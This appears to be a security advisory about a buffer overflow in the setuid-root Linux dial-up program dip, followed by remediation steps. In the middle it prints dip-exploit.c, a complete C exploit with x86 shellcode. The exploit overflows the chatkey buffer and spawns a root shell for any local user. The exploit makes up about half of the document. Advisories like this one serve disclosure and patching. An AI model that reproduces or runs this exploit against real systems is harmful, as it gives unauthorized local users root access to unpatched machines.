COMMAND

    dip

SYSTEMS AFFECTED

    Linux

PROBLEM

    dip  is  a  freely  available  program  that  is  included in most
    distributions of Linux. It is possible to build it for and use  it
    on other UNIX systems.

    The dip program manages  the connections needed for  dial-up links
    such as  SLIP and  PPP. It  can handle  both incoming and outgoing
    connections.  To  gain access to  resources it needs  to establish
    these  IP  connections,  the  dip  program  must  be  installed as
    set-user-id root.

    A vulnerability in dip makes  it possible to overflow an  internal
    buffer whose value  is under the  control of the  user of the  dip
    program. If this buffer  is overflowed with the  appropriate data,
    a program such as a shell  can be started. This program then  runs
    with root permissions on the local machine.

    Exploitation  scripts  for  dip  have  been found running on Linux
    systems for X86 hardware. Although exploitation scripts for  other
    architectures and operating  systems have not  yet been found,  we
    believe that they could be easily developed.

    On a  system that  has dip  installed as  set-user-id root, anyone
    with access to an account on that system can gain root access.

------------------------------------------------------------------------------
/* dip-exploit.c - overruns the buffer in do_chatkey() to give a shell */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_DIP "/usr/sbin/dip"

u_char shell[] = /* courtesy of avalon  ;) */
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

u_long esp() { __asm__("movl %esp, %eax"); }

main()
{
  u_char buf[1024];
  u_long addr;
  int i, f;

  strcpy(buf, "chatkey ");
  addr = esp() - 192;
  for (i=8; i<128+16; i+=4)
    *((u_long *) (buf+i)) = addr;
  for (i=128+16; i<512; i++)
    buf[i] = 0x90;
  for (i=0; i<strlen(shell); i++)
    buf[512+i] = shell[i];
  buf[512+i] = '\n';

  if ((f = open("temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
    perror("temp.dip");
    exit(0);
  }
  write(f, buf, 512+i);
  close(f);

  execl(PATH_DIP, "dip", "temp.dip", (char *)0);
}
------------------------------------------------------------------------------

SOLUTION

    Follow  the  steps  in  Section   A  to  disable  your   currently
    installed  version  of  dip.  Then,  if you need the functionality
    that dip provides, follow the steps given in Section B.

    A. Disable the presently installed version of dip.
       As root,

	   chmod 0755 /usr/sbin/dip

       By default, dip is  installed in the /usr/sbin  directory. Note
       that it may be installed elsewhere on your system.

    B. Install a new version of dip.
       If you need the  functionality that dip provides,  retrieve and
       install  the  following  version  of  the  source code for dip,
       which fixes this vulnerability. dip is available from :

    ftp://sunsite.unc.edu/pub/Linux/system/Network/serial/dip/dip337o-uri.tgz
    ftp://sunsite.unc.edu/pub/Linux/system/Network/serial/dip/dip337o-uri.tgz.sig

    MD5   (dip337o-uri.tgz) = 45fc2a9abbcb3892648933cadf7ba090
    SHash (dip337o-uri.tgz) = 6e3848b9b5f9d5b308bbac104eaf858be4dc51dc